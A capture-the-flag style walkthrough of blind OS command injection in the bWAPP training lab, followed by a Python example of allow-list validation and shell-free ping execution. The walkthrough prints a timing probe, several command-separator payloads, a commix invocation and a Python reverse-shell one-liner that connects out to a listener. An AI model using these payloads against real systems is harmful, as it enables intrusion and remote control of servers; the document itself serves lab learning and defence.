bWAPP - OS Command Injection (Blind)

In this walkthrough, we will be going through the OS Command Injection (Blind) vulnerability section from bWAPP Labs. We will be exploring and exploiting Blind OS Command Injection in the DNS Lookup functionality and learn how applications are affected by it. So, let’s get started with the Hacking without any delay.

OS Command Injection (Blind)

Security: Low

  • Setting the security level to Low.

Security level Low

  • The application has a command box which is used to ping an IP address. On intercepting the request via Burpsuite, we can see that it sends a POST request carrying our supplied parameter to the commandi_blind.php file. As this is a Blind OS command injection challenge, we will not get any command output back; the only feedback channel is the server's behaviour, such as a time delay.

OS Command Injection - Blind

Burpsuite intercept

  • I used the below payload to test the Blind command injection and it worked. The application hung for 5 seconds as per our supplied input.

127.0.0.1 | sleep 5

payload

  • Let’s exploit the server and get a reverse shell using the below payload.

127.0.0.1 | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.29.81",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

payload

netcat listener

Security: Medium

  • Setting the security level to Medium.

Security level medium

  • I used the same payload to test the Blind command injection and it worked. The application hung for 5 seconds as per our supplied input.

127.0.0.1 | sleep 5

payload

  • I used various payloads; however, I was unable to get the reverse shell manually. So, I used commix and it worked.

python3 commix.py -u "http://localhost/commandi_blind.php" --cookie="PHPSESSID=k6h767b8c040u52pi5hc0ilai1; security_level=1" --data="target=127.0.0.1&form=submit"

commix shell

Security: High

  • Setting the security level to High.

Security level high

  • I used the below payloads; however, none of them worked. So, I tried exploitation with commix and it did not work either.

127.0.0.1 ; sleep 5
127.0.0.1 & sleep 5
127.0.0.1 | sleep 5
127.0.0.1 || sleep 5
127.0.0.1 && sleep 5

payload

commix output

Conclusion

So, we finally completed all the security levels for the bWAPP OS Command Injection (Blind) Vulnerability. We looked at how the application is set up at each security level and how the security controls implemented there can be bypassed. Blind OS Command Injection attacks can be mitigated by completely avoiding OS commands in application-layer code and, where a command is unavoidable, validating the user input against a strict allow-list and passing it to the program as a separate argument rather than through a shell. On that note, I will take my leave and will meet you in the next one with another bWAPP vulnerability writeup, till then “Keep Hacking”.
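To make the mitigation concrete, here is an added example of how a ping/lookup handler can be hardened against the probes used in this walkthrough. It is not bWAPP's own code (bWAPP is PHP; this is Python for readability and testing), and the function names (validate_target, safe_ping, inspect_post_body, and so on) are assumptions. The allow-list check accepts only an IP literal or a DNS hostname, ping is invoked with an argument vector and no shell so that separators like `|`, `;` and `&&` are inert, and a small deny-list heuristic flags suspicious form fields for logging. The vulnerable_command function only returns the unsafe concatenated string for contrast and never executes it.

```python
"""Allow-list validation and shell-free execution for a ping/DNS-lookup form field.
Added example, not bWAPP's code; all names here are assumptions for illustration."""
from __future__ import annotations

import ipaddress
import subprocess
from urllib.parse import parse_qs

# Characters a POSIX shell treats as separators, redirections or substitutions. Any of
# these inside a "target" value is a strong indicator of a probe such as "| sleep 5".
SHELL_META = set(";|&$`<>()\n\r'\"\\ \t")


def _valid_hostname(value: str) -> bool:
    """RFC 1123 style check: dot-separated labels of [A-Za-z0-9-], 1-63 chars each,
    no leading or trailing hyphen, at most 253 characters overall."""
    name = value[:-1] if value.endswith(".") else value
    if not name or len(name) > 253:
        return False
    for label in name.split("."):
        if not 1 <= len(label) <= 63:
            return False
        if label.startswith("-") or label.endswith("-"):
            return False
        if not all((c.isascii() and c.isalnum()) or c == "-" for c in label):
            return False
    return True


def validate_target(value: str) -> bool:
    """Allow-list: exactly one IPv4/IPv6 literal or one DNS hostname, nothing else."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return _valid_hostname(value)


def looks_like_injection(value: str) -> bool:
    """Deny-list heuristic for logging and alerting only; the allow-list is the real control."""
    return any(ch in SHELL_META for ch in value)


def inspect_post_body(body: str) -> dict[str, str]:
    """Return the suspicious fields of a url-encoded POST body (the shape the form submits)."""
    fields = parse_qs(body, keep_blank_values=True)
    return {k: v[0] for k, v in fields.items() if v and looks_like_injection(v[0])}


def build_ping_argv(target: str) -> list[str]:
    """Argument vector for ping; raises ValueError for anything outside the allow-list."""
    if not validate_target(target):
        raise ValueError(f"rejected target: {target!r}")
    return ["ping", "-c", "1", "-W", "2", target]


def safe_ping(target: str, timeout: float = 5.0) -> tuple[int, str]:
    """Run ping with no shell involved: the target is a single argv element, so shell
    metacharacters are inert even if validation were somehow bypassed."""
    proc = subprocess.run(build_ping_argv(target), capture_output=True, text=True, timeout=timeout)
    return proc.returncode, proc.stdout


def vulnerable_command(target: str) -> str:
    """The unsafe pattern the walkthrough exploits: raw concatenation destined for a shell.
    Returned as a string and never executed, purely to contrast with build_ping_argv."""
    return "ping -c 1 " + target


if __name__ == "__main__":
    # Constructed sample inputs: two legitimate targets and two of the page's timing probes.
    for probe in ["127.0.0.1", "example.com", "127.0.0.1 | sleep 5", "127.0.0.1 && sleep 5"]:
        print(f"{probe!r:26} valid={validate_target(probe)!s:5} "
              f"suspicious={looks_like_injection(probe)}")
    # Constructed POST body in the form the application receives (target=127.0.0.1 | sleep 5).
    print(inspect_post_body("target=127.0.0.1+%7C+sleep+5&form=submit"))
```

Two design points are worth noting. First, the allow-list is the control that matters: every one of the five separator payloads from the High level fails validate_target, whatever the metacharacter, because none of them is a valid IP or hostname. Second, even with validation in place, invoking ping through an argument vector rather than a shell string removes the command-separator problem entirely, which is why avoiding shell_exec-style calls in application code is the first recommendation in the conclusion above.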
